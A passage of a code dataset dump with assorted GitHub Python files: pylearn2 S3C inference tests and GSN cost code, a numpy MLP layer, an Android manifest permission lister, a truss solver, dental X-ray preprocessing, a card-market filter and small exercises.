X.std()\n m, D = X.shape\n N = 5\n\n #don't give the model an e_step or learning rate so it won't spend years compiling a learn_func\n self.model = S3C(nvis = D,\n nhid = N,\n irange = .1,\n init_bias_hid = 0.,\n init_B = 3.,\n min_B = 1e-8,\n max_B = 1000.,\n init_alpha = 1., min_alpha = 1e-8, max_alpha = 1000.,\n init_mu = 1., e_step = None,\n m_step = Grad_M_Step(),\n min_bias_hid = -1e30, max_bias_hid = 1e30,\n )\n\n self.model.make_pseudoparams()\n\n self.h_new_coeff_schedule = [.1, .2, .3, .4, .5, .6, .7, .8, .9, 1. ]\n\n self.e_step = E_Step_Scan(h_new_coeff_schedule = self.h_new_coeff_schedule)\n self.e_step.register_model(self.model)\n\n self.X = X\n self.N = N\n self.m = m\n\n finally:\n config.floatX = self.prev_floatX\n\n def test_match_unrolled(self):\n \"\"\" tests that inference with scan matches result using unrolled loops \"\"\"\n\n unrolled_e_step = E_Step(h_new_coeff_schedule = self.h_new_coeff_schedule)\n unrolled_e_step.register_model(self.model)\n\n V = T.matrix()\n\n scan_result = self.e_step.infer(V)\n unrolled_result = unrolled_e_step.infer(V)\n\n outputs = []\n\n for key in scan_result:\n outputs.append(scan_result[key])\n outputs.append(unrolled_result[key])\n\n f = function([V], outputs)\n\n outputs = f(self.X)\n\n assert len(outputs) % 2 == 0\n\n for i in xrange(0,len(outputs),2):\n assert np.allclose(outputs[i],outputs[i+1])\n\n\n def test_grad_s(self):\n\n \"tests that the gradients with respect to s_i are 0 after doing a mean field update of s_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n model.test_batch_size = X.shape[0]\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n\n S = e_step.infer_S_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n\n s_idx = S[:,idx]\n\n s_i_func = function([H_var,Mu1_var,idx],s_idx)\n\n sigma0 = 1. / model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n grad_Mu1 = T.grad(trunc_kl.sum(), Mu1_var)\n\n grad_Mu1_idx = grad_Mu1[:,idx]\n\n grad_func = function([H_var, Mu1_var, idx], grad_Mu1_idx)\n\n for i in xrange(self.N):\n Mu1[:,i] = s_i_func(H, Mu1, i)\n\n g = grad_func(H,Mu1,i)\n\n assert not contains_nan(g)\n\n g_abs_max = np.abs(g).max()\n\n\n if g_abs_max > self.tol:\n raise Exception('after mean field step, gradient of kl divergence wrt mean field parameter should be 0, but here the max magnitude of a gradient element is '+str(g_abs_max)+' after updating s_'+str(i))\n\n def test_value_s(self):\n\n \"tests that the value of the kl divergence decreases with each update to s_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n S = e_step.infer_S_hat( V = X, H_hat = H_var, S_hat = Mu1_var)\n\n s_idx = S[:,idx]\n\n s_i_func = function([H_var,Mu1_var,idx],s_idx)\n\n sigma0 = 1. / model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n trunc_kl_func = function([H_var, Mu1_var], trunc_kl)\n\n for i in xrange(self.N):\n prev_kl = trunc_kl_func(H,Mu1)\n\n Mu1[:,i] = s_i_func(H, Mu1, i)\n\n new_kl = trunc_kl_func(H,Mu1)\n\n\n increase = new_kl - prev_kl\n\n\n mx = increase.max()\n\n if mx > 1e-3:\n raise Exception('after mean field step in s, kl divergence should decrease, but some elements increased by as much as '+str(mx)+' after updating s_'+str(i))\n\n def test_grad_h(self):\n\n \"tests that the gradients with respect to h_i are 0 after doing a mean field update of h_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n\n new_H = e_step.infer_H_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n h_idx = new_H[:,idx]\n\n updates_func = function([H_var,Mu1_var,idx], h_idx)\n\n sigma0 = 1. / model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0,\n var_s1_hat = Sigma1)\n\n grad_H = T.grad(trunc_kl.sum(), H_var)\n\n assert len(grad_H.type.broadcastable) == 2\n\n #from theano.printing import min_informative_str\n #print min_informative_str(grad_H)\n\n #grad_H = Print('grad_H')(grad_H)\n\n #grad_H_idx = grad_H[:,idx]\n\n grad_func = function([H_var, Mu1_var], grad_H)\n\n failed = False\n\n for i in xrange(self.N):\n rval = updates_func(H, Mu1, i)\n H[:,i] = rval\n\n g = grad_func(H,Mu1)[:,i]\n\n assert not contains_nan(g)\n\n g_abs_max = np.abs(g).max()\n\n if g_abs_max > self.tol:\n #print \"new values of H\"\n #print H[:,i]\n #print \"gradient on new values of H\"\n #print g\n\n failed = True\n\n print('iteration ',i)\n #print 'max value of new H: ',H[:,i].max()\n #print 'H for failing g: '\n failing_h = H[np.abs(g) > self.tol, i]\n #print failing_h\n\n #from matplotlib import pyplot as plt\n #plt.scatter(H[:,i],g)\n #plt.show()\n\n #ignore failures extremely close to h=1\n\n high_mask = failing_h > .001\n low_mask = failing_h < .999\n\n mask = high_mask * low_mask\n\n print('masked failures: ',mask.shape[0],' err ',g_abs_max)\n\n if mask.sum() > 0:\n print('failing h passing the range mask')\n print(failing_h[ mask.astype(bool) ])\n raise Exception('after mean field step, gradient of kl divergence'\n ' wrt freshly updated variational parameter should be 0, '\n 'but here the max magnitude of a gradient element is '\n +str(g_abs_max)+' after updating h_'+str(i))\n\n\n #assert not failed\n\n\n def test_value_h(self):\n\n \"tests that the value of the kl divergence decreases with each update to h_i \"\n\n model = self.model\n e_step = self.e_step\n X = self.X\n\n assert X.shape[0] == self.m\n\n init_H = e_step.init_H_hat(V = X)\n init_Mu1 = e_step.init_S_hat(V = X)\n\n prev_setting = config.compute_test_value\n config.compute_test_value= 'off'\n H, Mu1 = function([], outputs=[init_H, init_Mu1])()\n config.compute_test_value = prev_setting\n\n H = broadcast(H, self.m)\n Mu1 = broadcast(Mu1, self.m)\n\n H = np.cast[config.floatX](self.model.rng.uniform(0.,1.,H.shape))\n Mu1 = np.cast[config.floatX](self.model.rng.uniform(-5.,5.,Mu1.shape))\n\n\n H_var = T.matrix(name='H_var')\n H_var.tag.test_value = H\n Mu1_var = T.matrix(name='Mu1_var')\n Mu1_var.tag.test_value = Mu1\n idx = T.iscalar()\n idx.tag.test_value = 0\n\n newH = e_step.infer_H_hat(V = X, H_hat = H_var, S_hat = Mu1_var)\n\n\n h_idx = newH[:,idx]\n\n\n h_i_func = function([H_var,Mu1_var,idx],h_idx)\n\n sigma0 = 1. / model.alpha\n Sigma1 = e_step.infer_var_s1_hat()\n mu0 = T.zeros_like(model.mu)\n\n #by truncated KL, I mean that I am dropping terms that don't depend on H and Mu1\n # (they don't affect the outcome of this test and some of them are intractable )\n trunc_kl = - model.entropy_hs(H_hat = H_var, var_s0_hat = sigma0, var_s1_hat = Sigma1) + \\\n model.expected_energy_vhs(V = X, H_hat = H_var, S_hat = Mu1_var, var_s0_hat = sigma0, var_s1_hat = Sigma1)\n\n trunc_kl_func = function([H_var, Mu1_var], trunc_kl)\n\n for i in xrange(self.N):\n prev_kl = trunc_kl_func(H,Mu1)\n\n H[:,i] = h_i_func(H, Mu1, i)\n #we don't update mu, the whole point of the split e step is we don't have to\n\n new_kl = trunc_kl_func(H,Mu1)\n\n\n increase = new_kl - prev_kl\n\n\n print('failures after iteration ',i,': ',(increase > self.tol).sum())\n\n mx = increase.max()\n\n if mx > 1e-4:\n print('increase amounts of failing examples:')\n print(increase[increase > self.tol])\n print('failing H:')\n print(H[increase > self.tol,:])\n print('failing Mu1:')\n print(Mu1[increase > self.tol,:])\n print('failing V:')\n print(X[increase > self.tol,:])\n\n\n raise Exception('after mean field step in h, kl divergence should decrease, but some elements increased by as much as '+str(mx)+' after updating h_'+str(i))\n\nif __name__ == '__main__':\n obj = Test_S3C_Inference()\n\n #obj.test_grad_h()\n #obj.test_grad_s()\n #obj.test_value_s()\n obj.test_value_h()\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/models/tests/test_s3c_inference.py","file_name":"test_s3c_inference.py","file_ext":"py","file_size_in_byte":14386,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"18781909500","text":"import numpy as np\nfrom activation import relu, softmax\n\n\nclass FullyConnected:\n def __init__(self, dim_in, dim_out, batch_size, activation):\n # initialization according to He et al.(2015)\n self.W = np.random.randn(dim_in, dim_out).astype(np.float32) \\\n * np.sqrt(2.0/(dim_in))\n self.b = np.zeros([dim_out]).astype(np.float32)\n self.batch_size = batch_size\n self.activation = activation\n self.v_b = np.zeros([dim_out])\n self.v_W = np.zeros([dim_in, dim_out])\n\n def forward(self, inputs):\n self.inputs = inputs\n outputs = np.dot(inputs, self.W) + self.b\n self.outputs = outputs\n outputs = self.activation.forward(outputs)\n self.outputs_act = outputs\n return outputs\n\n def backward(self, grad):\n activ_grad = self.activation.backward(self.outputs,\n self.outputs_act, grad)\n self.grad_b = np.mean(activ_grad, axis=0)\n self.grad_W = np.dot(self.inputs.transpose(),\n activ_grad) / len(self.inputs)\n grad_inputs = np.dot(activ_grad, self.W.transpose())\n return grad_inputs\n\n def update(self, lr, momentum):\n self.v_b = momentum * self.v_b + lr * self.grad_b\n self.v_W = momentum * self.v_W + lr * self.grad_W\n self.W = self.W - self.v_W\n self.b = self.b - self.v_b\n","repo_name":"wenhycs/mlp-fashion-mnist","sub_path":"layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5951029207","text":"import os\nimport re\nimport sys\n\nargv = sys.argv\nargc = len(argv)\nstdout = sys.stdout\n\nif(argc != 2):\n stdout.write('Usage: python TP2p1.py manifests\\n')\n exit(1)\n\nmanifestsDirectory = argv[1]\n\n\n# ==============================================================================\n# === FILE READING =============================================================\n\ndef isXmlFile(fileName):\n return fileName.endswith('.xml')\n\ndef getXmlFilesPathsFromDirectory(directoryPath):\n try:\n filesNames = os.listdir(directoryPath)\n xmlFilesNames = filter(isXmlFile, filesNames)\n return [os.path.join(directoryPath, xmlFileName) for xmlFileName in xmlFilesNames]\n except:\n stdout.write('Could not find directory \"{}\"\\n'.format(directoryPath))\n exit(1)\n\ndef getAppNameFromFilePath(filePath):\n appNameRegex = 'AndroidManifest_(.*)\\.xml$'\n return re.search(appNameRegex, filePath).group(1)\n\ndef isPermissionTag(string):\n usesPermissionTagRegex = '^$'\n return re.search(usesPermissionTagRegex, string.strip()) is not None\n\ndef getPermissionsFromManifestFile(manifestFile):\n permissions = []\n permissionRegex = 'android.permission\\.(\\w*)\"'\n for line in manifestFile:\n if not isPermissionTag(line):\n continue\n\n permissionSearch = re.search(permissionRegex, line)\n if permissionSearch is not None:\n permissions.append(permissionSearch.group(1))\n\n return permissions\n\n\n# ==============================================================================\n# === PRINTING HELPERS =========================================================\n\ndef printHeader(title):\n stdout.write('===================\\n\\n')\n stdout.write('{}\\n\\n'.format(title))\n stdout.write('===================\\n\\n')\n\ndef printPermissions(permissions):\n stdout.write('{}\\n\\n'.format(permissions))\n\ndef printAppPermissions(appName, permissions):\n stdout.write('{}: {}\\n\\n'.format(appName, permissions))\n\n\n# ==============================================================================\n# === PROGRAM EXECUTION ========================================================\n\nappsPermissions = {}\n\n# Reads every manifest file\nfor manifestFilePath in getXmlFilesPathsFromDirectory(manifestsDirectory):\n appName = getAppNameFromFilePath(manifestFilePath)\n manifestFile = open(manifestFilePath, 'r')\n\n appPermissions = getPermissionsFromManifestFile(manifestFile)\n appsPermissions[appName] = appPermissions\n\n manifestFile.close()\n\n\n# Printing permissions\n\nprintHeader('Permissoes por APK')\nfor appName in sorted(appsPermissions):\n appPermissions = appsPermissions[appName]\n printAppPermissions(appName, appPermissions)\n\nprintHeader('Permissoes unicas por APK')\nfor appName in sorted(appsPermissions):\n appPermissions = appsPermissions[appName]\n\n allOtherPermissions = []\n for [appToCheckName, permissionsToCheck] in appsPermissions.items():\n if appToCheckName == appName:\n continue\n\n allOtherPermissions += permissionsToCheck\n\n uniquePermissions = [permission for permission in appPermissions if permission not in allOtherPermissions]\n printAppPermissions(appName, uniquePermissions)\n\n\nprintHeader('Permissoes comuns das APKs')\nallPermissionsLists = [set(permissionsList) for permissionsList in appsPermissions.values()]\ncommonPermissions = set.intersection(*allPermissionsLists)\nprintPermissions(list(commonPermissions))\n","repo_name":"jvmoreira/CDadosSeg","sub_path":"T2/Parte1/TP2p1.py","file_name":"TP2p1.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73618228647","text":"from draw import *\nclass Node:\n\tdef __init__(self,x=0,y=0,name=\"\"):\n\t\tself.x=x\n\t\tself.y=y\n\t\tself.name=name\n\t\t\nclass member:\n\tdef __init__(self,startnode,endnode,name=\"\",area=0):\n\t\tself.startnode=startnode\n\t\tself.endnode=endnode\n\t\tself.name=name\n\t\tself.area=area\n\t\t\n\tdef memberlength(self):\n\t\timport math\n\t\treturn(math.sqrt((self.startnode.x-self.endnode.x)**2+(self.startnode.y-self.endnode.y)**2))\n\tdef membereal(self,e):\n\t\treturn(float(e*self.area)/self.memberlength())\nclass Truss:\n\tnodes=[]\n\tmembers=[]\n\tdef __init__(self, inifile):\n\t\tself.inifile=inifile\n\t\t\n\tdef readini(self):\n\t\timport configparser\n\t\ttry:\n\t\t\tconfig = configparser.ConfigParser()\n\t\t\tconfig.read(self.inifile)\n\t\t\tself.points=int(config['base']['points'])\n\t\t\tself.bars=int(config['base']['bars'])\n\t\t\tself.e=int(config['base']['e'])\n\t\t\tfor inputnode in config.options('node'):\n\t\t\t\tif inputnode.find('p')!=-1:\n\t\t\t\t\tnodepoints=config['node'][inputnode].split(',')\n\t\t\t\t\tself.nodes.append(Node(int(nodepoints[0]),int(nodepoints[1]),inputnode))\n\t\t\t\t\t\n\t\t\tfor inputmember in config.options('member'):\n\t\t\t\tif inputmember.find('bar')!=-1:\n\t\t\t\t\tbarnodes=config['member'][inputmember].split(',')\n\t\t\t\t\t#print(barnodes)\n\t\t\t\t\tfor i in self.nodes:\n\t\t\t\t\t\tfor j in self.nodes:\n\t\t\t\t\t\t\tif i.name.strip('p')==barnodes[0] and j.name.strip('p')==barnodes[1]:\n\t\t\t\t\t\t\t\tself.members.append(member(i,j,inputmember))\n\t\t\t\t\tcontinue\n\t\t\t\telif inputmember.find('area')!=-1:\n\t\t\t\t\tareanum=inputmember.strip('area')\n\t\t\t\t\tfor n in self.members:\n\t\t\t\t\t\tif n.name.strip('bar')==areanum:\n\t\t\t\t\t\t\tn.area=float(config['member'][inputmember])\n\t\t\t#for n in self.nodes:\n\t\t\t#\tprint(n.name,n.x,n.y)\n\t\t\t#for n in self.members:\n\t\t\t\t#print(n.memberlength())\n\t\t\t\t#print(n.startnode, n.endnode, n.name,n.area)\n\t\texcept:\n\t\t\tprint(\"ini fail\")\n\tdef outputini(self):\n\t\timport configparser\n\t\tconfig = configparser.ConfigParser()\n\t\tf = open('0551287OUT.ini', 'w')\n\t\tconfig.add_section('MemberLengthResult')\n\t\tfor i in self.members:\n\t\t\tconfig.set('MemberLengthResult',i.name,\" length %.1f, E*A/L %.1f\"%(i.memberlength(),i.membereal(self.e)))\n\t\tconfig.write(f)\n\t\tf.close()\n\ndef main():\n\tt=Truss(\"0551287.ini\")\n\tt.readini()\n\tt.outputini()\n\tdrawout=drawtruss(t,10)\n\tdrawout.creatCanvas()\n\tdrawout.drawbar()\n\tdrawout.drawcircle()\n\tdrawout.root.mainloop()\n\t\nif __name__ == '__main__':\n\tmain()","repo_name":"joechung99/Computer-Programming-and-Engineering-Application","sub_path":"project2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31551191506","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 25 20:40:26 2018\r\n\r\n@author: Kevin\r\n\"\"\"\r\n\r\nimport math\r\n# Prompt the user to input a number\r\ninput_num = float(input(\"Input a number: \"))\r\n\r\n# Output the log of that number (base 10)\r\nprint(\"Log base 10 of that number is: \" + str(math.log10(input_num)))\r\n\r\nlog10_num = math.log10(input_num)\r\nresult = math.floor(log10_num)\r\n\r\n# Output the nearest integer less than that number \r\nprint(\"Nearest int to result is: \" + str(result))\r\n\r\n# prompt the user to input two numbers\r\nnum1 = float(input(\"Input the first number: \"))\r\nnum2 = float(input(\"Input the second number: \"))\r\nsum1 = num1 + num2\r\nprint(\"The sum of those two numbers is \", sum1)\r\n","repo_name":"kmak2008/Test","sub_path":"Labs/Lab 3 Solution.py","file_name":"Lab 3 Solution.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13306226156","text":"import numpy as np\nimport pandas as pd\nimport json\nfrom PIL import Image\nimport cv2\nimport os\nfrom tqdm import tqdm\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\nfrom scipy import ndimage\nimport random\nimport albumentations as A\n\ndef make_nochange_onlyTrain(data_path, label_path): \n\tos.makedirs('./src/images/train', exist_ok=True)\n\t# train data\n\ttrain_imgs_path = data_path\n\twith open(label_path) as f:\n\t\tjson_data = json.load(f)\n\n\timg_names = list(json_data.keys())\n\tfor img_name in tqdm(img_names,desc='{}'.format('train_preprocess')):\n\t\t# img\n\t\timg_path = train_imgs_path+'/'+img_name\n\t\timg_gray = np.array(Image.open(img_path).convert('L')) \n\t\timg_h, img_w = img_gray.shape[0], img_gray.shape[1]\n\t\t# eda.py를 바탕으로 크롭할 부분 지정하기 (나중에)\n\t\tclahe1 = cv2.createCLAHE(clipLimit=2, tileGridSize=(8,8))\n\t\tclahe2 = cv2.createCLAHE(clipLimit=2, tileGridSize=(30,30))\n\t\timg_cl1 = clahe1.apply(img_gray)\n\t\timg_cl2 = clahe2.apply(img_gray)\n\t\timg_cl_twice = clahe1.apply(img_cl2)\n\t\tfinal = np.dstack((img_cl_twice, img_cl2, img_cl1))\n\t\tsave_img = Image.fromarray(final.astype(np.uint8))\n\t\tsave_img.save('./src/images/train/{}'.format(img_name)) # ./dataset_nochange/images/train/{}\n\ndef make_Aug_Test(data_path):\n\tos.makedirs('./src/images/test', exist_ok=True)\n\t# test data\n\ttest_imgs_path = data_path # '../../../DATA/data_teeth/test'\n\timg_names = os.listdir(test_imgs_path)\n\tfor img_name in tqdm(img_names,desc='{}'.format('test_preprocess')):\n\t\t# 기본 img\n\t\timg_path = test_imgs_path+'/'+img_name\n\t\timg_gray = np.array(Image.open(img_path).convert('L')) \n\t\timg_h, img_w = img_gray.shape[0], img_gray.shape[1]\n\t\tclahe1 = cv2.createCLAHE(clipLimit=2, tileGridSize=(8,8))\n\t\tclahe2 = cv2.createCLAHE(clipLimit=2, tileGridSize=(30,30))\n\t\timg_cl1 = clahe1.apply(img_gray)\n\t\timg_cl2 = clahe2.apply(img_gray)\n\t\timg_cl_twice = clahe1.apply(img_cl2)\n\t\tfinal = np.dstack((img_cl_twice, img_cl2, img_cl1))\n\t\tsave_img = Image.fromarray(final.astype(np.uint8))\n\t\tsave_img.save('./src/images/test/{}'.format(img_name))","repo_name":"oungji212/Teeth-Challenge","sub_path":"submit_code/src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26481916097","text":"#!/usr/bin/env python3\n\n\nclass CmFilter:\n\n def __init__(self, config):\n if config is not None:\n self.config = config\n else:\n raise ValueError(\"No config given\")\n\n def prefilter(self, card_listings, card):\n offers_to_remove = []\n for offer in card_listings[\"article\"]:\n if self._offer_not_matching_card(offer, card):\n offers_to_remove.append(offer)\n for offer in offers_to_remove:\n card_listings[\"article\"].remove(offer)\n\n def _offer_not_matching_card(self, offer, card):\n ret_val = False\n ret_val = self._country_not_matching(offer, ret_val)\n if not ret_val:\n ret_val = self._playset_not_matching(card, offer, ret_val)\n return ret_val\n\n def _playset_not_matching(self, card, offer, ret_val):\n if offer[\"isPlayset\"] != card[\"isPlayset\"]:\n ret_val = True\n return ret_val\n\n def _country_not_matching(self, offer, ret_val):\n offer_country = offer[\"seller\"][\"address\"][\"country\"]\n if offer_country != self.config[\"listing_static_filter\"][\"seller_country\"]:\n ret_val = True\n return ret_val\n\n def stock_filter(self, card_inventory):\n offers_to_remove = []\n for item in card_inventory[\"article\"]:\n if \"|#00\" in item[\"comments\"]:\n offers_to_remove.append(item)\n for offer in offers_to_remove:\n card_inventory[\"article\"].remove(offer)\n","repo_name":"SoftPofi/cm-boy","sub_path":"cm_boy/CmFilter.py","file_name":"CmFilter.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70631071849","text":"class Solution(object):\n\tdef productExceptSelf(self, nums):\n \tleft, right = 1, 1\n \tresult = [1] * len(nums)\n \tfor i in range(1, len(nums)):\n \t\tleft *= nums[i - 1]\n \t\tright *= nums[len(nums) - i]\n \t\tresult[i] *= left\n \t\tresult[len(nums) - i - 1] *= right\n \treturn result\n\nif __name__ == \"__main__\":\n\tsolution = Solution()\n\tprint(solution.productExceptSelf([1,2,3,4]), \"[expected: [24,12,8,6]]\")\n\tprint(solution.productExceptSelf([-1,1,0,-3,3]), \"[expected: [0,0,9,0,0]]\")\n","repo_name":"ChiaHaoChangTw/LeetCodePractice","sub_path":"Problem238.py","file_name":"Problem238.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5650852002","text":"\"\"\"\nThe GSNCost class.\n\"\"\"\nfrom functools import wraps\n\nfrom pylearn2.compat import OrderedDict\nfrom pylearn2.costs.cost import Cost\nfrom pylearn2.costs.autoencoder import GSNFriendlyCost\nfrom pylearn2.space import CompositeSpace\nfrom pylearn2.utils import safe_zip\n\n\nclass GSNCost(Cost):\n \"\"\"\n Customizable cost class for GSNs.\n\n Note from IG: the following is not 100% accurate, you can use\n CompositeSpace to model interactions between arbitrarily many\n vectors.\n\n This class currently can only handle datasets with only one or two sets\n of vectors. The get_input_source and get_target_source methods on the model\n instance are called to get the names for the fields in the dataset.\n get_input_source() is used for the name of the first set of vectors and\n get_target_source() is used for the second set of vectors.\n\n The explicit use of get_input_source and get_target_source (and the\n non-existance of similar hooks) is what limits this class to learning\n the joint distribution between only 2 sets of vectors. The allow for more\n than 2 sets of vectors, the Model class would need to be modified,\n preferably\n in a way that allows reference to arbitrarily many sets of vectors within\n one dataset.\n\n Parameters\n ----------\n costs : list of (int, double, GSNFriendlyCost or callable) tuples\n The int component of each tuple is the index of the layer at\n which we want to compute this cost.\n The double component of the tuple is the coefficient to associate\n to with the cost.\n The GSNFriendlyCost instance is the cost that will be computed.\n If that is a callable rather than an instance of GSN friendly\n cost, it will be called with 2 arguments: the initial value\n followed by the reconstructed value.\n Costs must be of length 1 or 2 (explained in docstring for\n GSNCost class) and the meaning of the ordering of the costs\n parameter is explained in the docstring for the mode parameter.\n walkback : int\n How many steps of walkback to perform\n mode : str\n Must be either 'joint', 'supervised', or 'anti_supervised'.\n The terms \"input layer\" and \"label layer\" are used below in the\n description of the modes. The \"input layer\" refers to the layer\n at the index specified in the first tuple in the costs parameter,\n and the \"label layer\" refers to the layer at the index specified\n in the second tuple in the costs parameter.\n 'joint' means setting all of the layers and calculating\n reconstruction costs.\n 'supervised' means setting just the input layer and attempting to\n predict the label layer\n 'anti_supervised' is attempting to predict the input layer given\n the label layer.\n \"\"\"\n\n def __init__(self, costs, walkback=0, mode=\"joint\"):\n super(GSNCost, self).__init__()\n self.walkback = walkback\n\n assert mode in [\"joint\", \"supervised\", \"anti_supervised\"]\n if mode in [\"supervised\", \"anti_supervised\"]:\n assert len(costs) == 2\n self.mode = mode\n\n msg = \"This is (hopefully) a temporary restriction\"\n assert len(costs) in [1, 2], msg\n msg = \"Must have only one cost function per index\"\n assert len(set(c[0] for c in costs)) == len(costs), msg\n self.costs = costs\n\n # convert GSNFriendCost instances into just callables\n for i, cost_tup in enumerate(self.costs):\n if isinstance(cost_tup[2], GSNFriendlyCost):\n mutable = list(cost_tup)\n mutable[2] = cost_tup[2].cost\n self.costs[i] = tuple(mutable)\n else:\n assert callable(cost_tup[2])\n\n @staticmethod\n def _get_total_for_cost(idx, costf, init_data, model_output):\n \"\"\"\n Computes the total cost contribution from one layer given the full\n output of the GSN.\n\n Parameters\n ----------\n idx : int\n init_data and model_output both contain a subset of the layer \\\n activations at each time step. This is the index of the layer we \\\n want to evaluate the cost on WITHIN this subset. This is \\\n generally equal to the idx of the cost function within the \\\n GSNCost.costs list.\n costf : callable\n Function of two variables that computes the cost. The first \\\n argument is the target value, and the second argument is the \\\n predicted value.\n init_data : list of tensor_likes\n Although only the element at index \"idx\" is accessed/needed, this \\\n parameter is a list so that is can directly handle the data \\\n format from GSN.expr.\n model_output : list of list of tensor_likes\n The output of GSN.get_samples as called by GSNCost.expr.\n \"\"\"\n total = 0.0\n for step in model_output:\n total += costf(init_data[idx], step[idx])\n\n # normalize for number of steps\n return total / len(model_output)\n\n def _get_samples_from_model(self, model, data):\n \"\"\"\n .. todo::\n\n WRITEME properly\n\n Handles the different GSNCost modes.\n \"\"\"\n layer_idxs = [idx for idx, _, _ in self.costs]\n zipped = safe_zip(layer_idxs, data)\n if self.mode == \"joint\":\n use = zipped\n elif self.mode == \"supervised\":\n # don't include label layer\n use = zipped[:1]\n elif self.mode == \"anti_supervised\":\n # don't include features\n use = zipped[1:]\n else:\n raise ValueError(\"Unknown mode \\\"%s\\\" for GSNCost\" % self.mode)\n\n return model.get_samples(use,\n walkback=self.walkback,\n indices=layer_idxs)\n\n def expr(self, model, data):\n \"\"\"\n Theano expression for the cost.\n\n Parameters\n ----------\n model : GSN object\n WRITEME\n data : list of tensor_likes\n Data must be a list or tuple of the same length as self.costs.\n All elements in data must be a tensor_like (cannot be None).\n\n Returns\n -------\n y : tensor_like\n The actual cost that is backpropagated on.\n \"\"\"\n self.get_data_specs(model)[0].validate(data)\n output = self._get_samples_from_model(model, data)\n\n total = 0.0\n for cost_idx, (_, coeff, costf) in enumerate(self.costs):\n total += (coeff *\n self._get_total_for_cost(cost_idx, costf, data, output))\n\n coeff_sum = sum(coeff for 